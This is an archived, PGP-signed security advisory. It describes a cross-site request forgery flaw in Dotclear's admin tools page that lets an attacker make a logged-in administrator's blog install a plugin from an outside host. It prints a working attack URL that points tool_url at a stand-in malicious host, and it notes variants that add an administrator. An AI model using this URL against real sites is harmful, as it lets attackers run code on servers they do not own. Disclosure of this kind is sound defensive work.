TUCoPS :: Web :: Blogs :: tb11585.htm

Dotclear remote script execution
Dotclear remote script execution
Dotclear remote script execution


-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

Hello,

There is a French website about two vulnerabilities ; the one works on
Wordpress (27/05/2007) and the other on Dotclear (08/07/2007) :

http://ar3av.free.fr/sommaire.php 


If a Dotclear blog administrator is logged in (or has a cookie for
automatic identification), you can redirect him (by an image posted in
his forum for example) to an URL such as :
http://the-dotclear-blog.com/dotclear/ecrire/tools.php?tool_url=http://www.malicious-website.com/malicious-file.pkg.gz&p=toolsmng 
In this case, Dotclear will get, install and activate the plugin
http://www.malicious-website.com/malicious-file.pkg.gz 
It's very easy now to execute arbitrary instructions on the remote server.

A temporary solution is to rename admin's folder ("ecrire" for Dotclear
1 or "admin" for Dotclear 2). There is no official patch at this time.

There is some other examples that allow you to add an administrator,
change the website's theme, based on the same concept.

Best regards,
Sacha
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.1 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org 

iD8DBQFGlRWcPiOocQNLzbYRAoFxAJsHoll3YaZPnzUv5gWlh93sNThfLgCeJDFF
GIH89HCHRTXaMSf5gbz9NIM=lnZU
-----END PGP SIGNATURE-----

TUCoPS is optimized to look best in Firefox® on a widescreen monitor (1440x900 or better).
Site design & layout copyright © 1986-2024 AOH